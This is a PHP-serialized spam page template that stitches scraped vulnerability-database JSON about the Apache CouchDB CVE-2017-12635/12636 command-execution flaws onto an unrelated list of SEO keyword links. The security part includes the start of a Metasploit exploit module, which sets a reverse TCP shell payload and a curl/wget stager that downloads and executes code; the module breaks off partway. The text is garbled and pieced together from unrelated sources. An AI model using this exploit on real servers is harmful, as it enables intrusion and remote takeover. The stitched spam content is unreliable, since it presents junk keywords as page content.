a:5:{s:8:"template";s:17037:" {{ keyword }}
{{ links }}
{{ text }}
";s:4:"text";s:5736:"It\u2019s sort of like a big key-value store for JSON blobs (\u201cdocuments\u201d), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. ", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-12635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "published": "2017-11-14T20:29:00", "title": "CVE-2017-12635", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:56:26", "bulletinFamily": "exploit", "description": "There was a vulnerability in CouchDB caused by a discrepancy between the database\u2019s native JSON parser and the Javascript JSON parser used during document validation. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\n", "published": "2018-03-27T09:43:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html", "http://docs.couchdb.org/en/latest/cve/2017-12636.html", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "lastseen": "2020-07-28T21:57:35", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2020-07-28T21:57:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12635", "CVE-2017-12636"]}, {"type": "seebug", "idList": ["SSV:96869"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873892", "OPENVAS:1361412562310873886", "OPENVAS:1361412562310107259", "OPENVAS:1361412562310891252", "OPENVAS:1361412562310107258", "OPENVAS:1361412562310873893", "OPENVAS:1361412562310873882"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:147295", "PACKETSTORM:148273"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1252-1:853FC"]}, {"type": "exploitdb", "idList": ["EDB-ID:44498", "EDB-ID:45019", "EDB-ID:44913"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1252.NASL", "GENTOO_GLSA-201711-16.NASL", "FEDORA_2017-A20D92573B.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-30608", "1337DAY-ID-30226", "1337DAY-ID-29083", "1337DAY-ID-30713"]}, {"type": "gentoo", "idList": ["GLSA-201711-16"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FE23A23D6F2682CE0AFF06B76414F327", "EXPLOITPACK:A9E6BFA0E5E6880671080D586B43B822"]}, {"type": "freebsd", "idList": ["1E54D140-8493-11E8-A795-0028F8D09152"]}, {"type": "canvas", "idList": ["COUCHDB_ROLES"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/COUCHDB/COUCHDB_ENUM"]}], "modified": "2020-07-28T21:57:35", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_couchdb_cmd_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\n 'Description' => %q{\n CouchDB administrative users can configure the database server via HTTP(S).\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\n including downloading and executing scripts from the public internet.\n },\n 'Author' => [\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\n 'Green-m ' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2017-12636'],\n ['CVE', '2017-12635'],\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\n ],\n 'DisclosureDate' => 'Apr 6 2016',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'curl'\n },\n 'CmdStagerFlavor' => ['curl', 'wget'],\n 'Targets' => [\n ['Automatic', {}],\n ['Apache CouchDB version 1.x', {}],\n ['Apache CouchDB version 2.x', {}]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(5984),\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. ";s:7:"keyword";s:40:"Apache CouchDB _config Command Execution";s:5:"links";s:5445:"Pompano Jig With Teaser, Vidalia Steven Universe, Venezuela Currency History, Mcdonald's Birthday Voucher, Eagle Park Brewing Hand Sanitizer, Glacier In Asl, Everyday Power Blog, Fujitsu Computers Siemens Monitor, The Moguls Movie, Moose Lake Weather, Harish Chandra Information In Marathi, Where Is Scott Wapner From, When Did Newspapers Start, Just Like A Child - Jw Song, Who Is Stargirl's Father, Alf Lucky 2, Jabal Moussa Mountain, Anohni Hopelessness Songs, Cnbc Millennial Money Sign Up, Ttu Library Hours, Bobbili Simham Music Director, Mike Curtis Hall Of Fame, Peru Size In Square Miles, Memory Power Book Pdf, Nba League Pass Canada Raptors, Workday Glassdoor Dublin, Huron Ohio Fishing Report, Netflix Business Model PDF, Erik Knudsen Uclan, Indonesia Currency Rate, Designer Iphone 11 Pro Case, Dr Ann Wolbert Burgess Married, Centene Virtual Investor Day, Betelgeuse Distance From Sun, Katz Broadcasting Wiki, Saltenas Near Me, Antonia Maria Castro Argota, Tarpon Fishing Boca Raton, Cynthia Cleese Net Worth, Gee Up Pronunciation, Danny Fortson Net Worth, Server Stats Bot, Zte Wifi Login, Smith Ranch Road Movies, Mindy Kaling Cousin, Spring Smallmouth Lures, Functions Of Environment Pdf, Nhi Premium Bonds, Famous For (i Believe), Willis Tower Cost, Oracle Cloud Infrastructure Foundations Associate, Fritz Pollard Death, White Christmas Tap Dance, ";s:7:"expired";i:-1;}